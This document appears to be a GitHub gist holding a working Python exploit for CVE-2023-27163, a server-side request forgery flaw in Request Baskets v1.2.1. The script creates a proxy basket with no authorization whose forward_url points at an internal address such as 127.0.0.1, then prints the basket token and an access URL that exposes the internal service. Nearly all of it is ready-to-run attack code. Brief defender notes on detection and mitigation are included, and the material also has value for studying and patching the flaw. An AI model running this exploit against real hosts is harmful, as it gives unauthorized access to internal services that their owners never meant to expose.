@rudSarkar
Last active August 29, 2025 14:58
Request Baskets v1.2.1 SSRF Exploit
#!/usr/bin/python3
# https://nvd.nist.gov/vuln/detail/CVE-2023-27163
# https://github.com/darklynx/request-baskets
import argparse
import random
import string
import requests
def random_chars(length=6):
    """Return ``length`` random lowercase ASCII letters.

    The caller uses the result as a throwaway basket name. The ``random``
    module is not cryptographically secure; the value here is only a
    name, not a secret.
    """
    letters = []
    for _ in range(length):
        letters.append(random.choice(string.ascii_lowercase))
    return "".join(letters)
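def main():
    """Proof of concept for CVE-2023-27163 (SSRF in request-baskets).

    Sends one POST to ``<-u>api/baskets/<random name>`` whose JSON body sets
    ``forward_url`` to the ``-t`` value and ``proxy_response`` to true. The
    script sends no Authorization header. On HTTP 201 it prints the token
    from the response and the basket URL.

    Defender notes: the observable artefact is a basket-creation request
    whose ``forward_url`` points at a loopback or internal address, followed
    by requests to ``/<basket name>/``. Mitigations are upgrading to a
    release that addresses the CVE, limiting who can reach the basket API,
    and egress-filtering the host so it cannot reach loopback or internal
    services.
    """
    parser = argparse.ArgumentParser(
        prog="Request Baskets v1.2.1 SSRF Exploit",
        description='python3 exploit.py -u http://10.10.12.22:55555/ -t http://127.0.0.1:80',
        allow_abbrev=False,
    )
    parser.add_argument("-u", help="URL of the target, eg: http://10.10.12.22:55555/")
    parser.add_argument("-t", help="Target URL for SSRF eg: http://127.0.0.1:80")
    args = parser.parse_args()

    # Both values are interpolated into the request below; with only one of
    # them given the original built URLs containing the literal text "None".
    if not (args.u and args.t):
        parser.print_help()
        return

    basketName = random_chars()
    # NOTE: plain concatenation, so -u is expected to end with "/" as in the help text.
    apiURL = f"{args.u}api/baskets/{basketName}"

    print(f"[+] Creating basket {basketName} proxy basket")

    payload = {
        "forward_url": f"{args.t}",
        "proxy_response": True,
        "insecure_tls": False,
        "expand_path": True,
        "capacity": 250
    }
    headers = {"Content-Type": "application/json"}

    # requests has no default timeout; without one an unresponsive host
    # blocks the script indefinitely.
    try:
        sendingRequest = requests.post(apiURL, headers=headers, json=payload, timeout=10)
    except requests.RequestException as exc:
        print(f"[-] Request to {apiURL} failed: {exc}")
        return

    # Anything other than 201 means no basket was created, so do not print
    # an access URL for a basket that does not exist.
    if sendingRequest.status_code != 201:
        print(f"[-] Basket was not created (HTTP {sendingRequest.status_code})")
        return

    print(f"[+] Basket created '{basketName}'")
    # The token is read from the creation response (presumably the basket's
    # management credential; confirm against the service docs). It goes to
    # stdout, so it ends up in any captured terminal output or logs.
    token = sendingRequest.json()["token"]
    print(token)

    print(f"\nNow you can access the service visiting: {args.u}{basketName}/\n")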
# Run the proof of concept only when executed as a script, not on import.
if __name__ == "__main__":
    main()